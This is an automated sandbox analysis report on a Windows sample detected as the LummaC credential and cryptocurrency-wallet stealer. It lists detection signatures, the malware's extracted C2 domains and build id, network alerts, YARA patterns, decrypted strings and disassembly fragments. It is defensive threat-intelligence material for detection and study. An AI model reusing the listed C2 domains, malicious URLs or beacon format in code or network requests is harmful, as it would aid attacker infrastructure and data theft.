Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AZCFTWko2q.exe

Overview

General Information

Sample name:AZCFTWko2q.exe
renamed because original name is a hash value
Original sample name:7c13e0cbd1513abe7f2d2d73cc0ad615.exe
Analysis ID:1575332
MD5:7c13e0cbd1513abe7f2d2d73cc0ad615
SHA1:375062b73661432e50e66cf08557ff3b737c8914
SHA256:979cfe34baa41bc1556c9349402ced4242d6a7b3f0197d9e07643caa363daa93
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AZCFTWko2q.exe (PID: 3284 cmdline: "C:\Users\user\Desktop\AZCFTWko2q.exe" MD5: 7C13E0CBD1513ABE7F2D2D73CC0AD615)
    • 86DC.tmp.exe (PID: 5868 cmdline: "C:\Users\user\AppData\Local\Temp\86DC.tmp.exe" MD5: D88E2431ABAC06BDF0CD03C034B3E5E3)
      • WerFault.exe (PID: 5556 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1708 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["awake-weaves.cyou", "effecterectz.xyz", "sordid-snaked.cyou", "deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "immureprech.biz"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1760070387.00000000008D8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1278:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.3895623378.0000000000A39000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xfb0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        Click to see the 3 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.3.86DC.tmp.exe.2510000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
          3.3.86DC.tmp.exe.2510000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            3.2.86DC.tmp.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              3.2.86DC.tmp.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:31.198097+010020283713Unknown Traffic192.168.2.849707172.67.207.38443TCP
                2024-12-15T09:20:33.274722+010020283713Unknown Traffic192.168.2.849708104.21.16.1443TCP
                2024-12-15T09:20:36.684902+010020283713Unknown Traffic192.168.2.84971123.55.153.106443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:31.911159+010020546531A Network Trojan was detected192.168.2.849707172.67.207.38443TCP
                2024-12-15T09:20:34.267261+010020546531A Network Trojan was detected192.168.2.849708104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:31.911159+010020498361A Network Trojan was detected192.168.2.849707172.67.207.38443TCP
                2024-12-15T09:20:34.267261+010020498361A Network Trojan was detected192.168.2.849708104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:33.274722+010020582151Domain Observed Used for C2 Detected192.168.2.849708104.21.16.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:31.198097+010020582231Domain Observed Used for C2 Detected192.168.2.849707172.67.207.38443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:34.868837+010020582101Domain Observed Used for C2 Detected192.168.2.8508551.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:31.916295+010020582141Domain Observed Used for C2 Detected192.168.2.8523211.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:34.582731+010020582161Domain Observed Used for C2 Detected192.168.2.8560231.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:34.441300+010020582181Domain Observed Used for C2 Detected192.168.2.8518691.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:34.296521+010020582201Domain Observed Used for C2 Detected192.168.2.8545711.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:29.821766+010020582221Domain Observed Used for C2 Detected192.168.2.8507411.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:29.679458+010020582261Domain Observed Used for C2 Detected192.168.2.8505831.1.1.153UDP
                2024-12-15T09:20:35.009441+010020582261Domain Observed Used for C2 Detected192.168.2.8592451.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:34.727477+010020582361Domain Observed Used for C2 Detected192.168.2.8495711.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:23.689288+010028032742Potentially Bad Traffic192.168.2.849705104.21.56.70443TCP
                2024-12-15T09:20:25.258834+010028032742Potentially Bad Traffic192.168.2.849706176.113.115.1980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-15T09:20:37.462041+010028586661Domain Observed Used for C2 Detected192.168.2.84971123.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: AZCFTWko2q.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://wrathful-jammy.cyou/2Avira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/apioAvira URL Cloud: Label: malware
                Source: https://sordid-snaked.cyou/apimsAvira URL Cloud: Label: malware
                Source: https://wrathful-jammy.cyou/piAvira URL Cloud: Label: malware
                Source: https://deafeninggeh.biz/iAvira URL Cloud: Label: malware
                Source: https://post-to-me.com/DsAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                Found malware configuration
                Source: 3.3.86DC.tmp.exe.2510000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["awake-weaves.cyou", "effecterectz.xyz", "sordid-snaked.cyou", "deafeninggeh.biz", "diffuculttan.xyz", "debonairnukk.xyz", "wrathful-jammy.cyou", "immureprech.biz"], "Build id": "4h5VfH--"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeReversingLabs: Detection: 62%
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeReversingLabs: Detection: 62%
                Multi AV Scanner detection for submitted file
                Source: AZCFTWko2q.exeVirustotal: Detection: 56%Perma Link
                Source: AZCFTWko2q.exeReversingLabs: Detection: 55%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: AZCFTWko2q.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: awake-weaves.cyou
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: wrathful-jammy.cyou
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: debonairnukk.xyz
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: diffuculttan.xyz
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: effecterectz.xyz
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: deafeninggeh.biz
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: immureprech.biz
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: sordid-snaked.cyou
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--

                Compliance

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeUnpacked PE file: 0.2.AZCFTWko2q.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeUnpacked PE file: 3.2.86DC.tmp.exe.400000.0.unpack
                Source: AZCFTWko2q.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.38:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                Source: C:\Users\user\Desktop\AZCFTWko2q.exeCode function: 0_2_024F8C59 FindFirstFileExW,0_2_024F8C59
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_00426054
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp ecx3_2_0043C280
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, eax3_2_00427326
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_00426E50
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_0043BF40
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_024AD25A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_024AD25A
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_024DC268
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2CF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2CF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2C4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2C4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_024DB2C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB2C2
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_024DB3FC
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp al, 2Eh3_2_024C63B6
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, edx3_2_024AC030
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then jmp eax3_2_024C70E4
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_024DD0F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_024C60F7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB08B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB0AF
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB05B
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_024BE1E7
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_024CA637
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CC6C3
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024CB763
                Source: C:\Users\user\AppData\Local\Temp\86DC.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CB763
